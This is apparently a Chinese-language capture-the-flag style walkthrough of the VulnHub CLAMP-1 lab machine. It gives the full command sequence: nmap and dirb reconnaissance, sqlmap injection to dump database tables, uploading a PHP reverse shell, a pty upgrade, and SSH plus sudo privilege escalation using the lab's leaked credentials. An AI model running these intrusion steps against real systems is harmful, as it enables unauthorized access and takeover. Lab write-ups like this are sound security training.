CLAMP-1靶机渗透测试

一、靶机下载地址

https://www.vulnhub.com/entry/clamp-101,320/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:88:B4:BF"

2、端口扫描

# 使用命令
nmap 192.168.145.0/24 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.206

4、目录扫描

# 使用命令
dirb http://192.168.145.206

三、获取shell

1、访问靶机IP地址

2、拼接并访问 /nt4stopc/，发现下面有一些问题，提示必须收集答案

3、都是一些判断题，对与错对应1与0，最后结果为0110111001，拼接访问

4、点击图中位置，发现存在参数，php语言，尝试注入，and 1=1 --+ 显示正常，and 1=2--+ 显示异常,表名存在SQL注入

5、使用sqlmap工具进行检测

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch

6、获取库名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

7、获取tatil库下的表名

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil --tables

8、获取gereksiz字段下的数据

# 使用命令
python3 sqlmap.py -u "http://192.168.145.206/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch -D tatil -T gereksiz --columns --dump

9、解码后如下结果，可能还是路径，拼接访问

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

10、再拼接 upload.php，发现文件上传的功能

11、但是没有提交按钮，自己在前端给加一个

12、kali 生成反弹 shell

# 使用命令
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php

13、上传该文件后，返回了文件路径，文件名为md5加密后的

14、拼接访问文件，成功反弹shell

四、提权

1、使用 python 提升交互性

# 使用命令
python3 -c 'import pty;pty.spawn("/bin/bash")'

2、在 /var/www/html 下发现 important.pcapng文件

3、查看文件，发现内容

4、url解码，得到以下数据，账号密码为mkelepce:mklpc-osas112.

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

5、使用ssh连接，连接成功

# 使用命令
ssh mkelepce@192.168.145.206

6、查看当前权限

# 使用命令
sudo -l
mklpc-osas112.

7、执行sudo su命令提权成功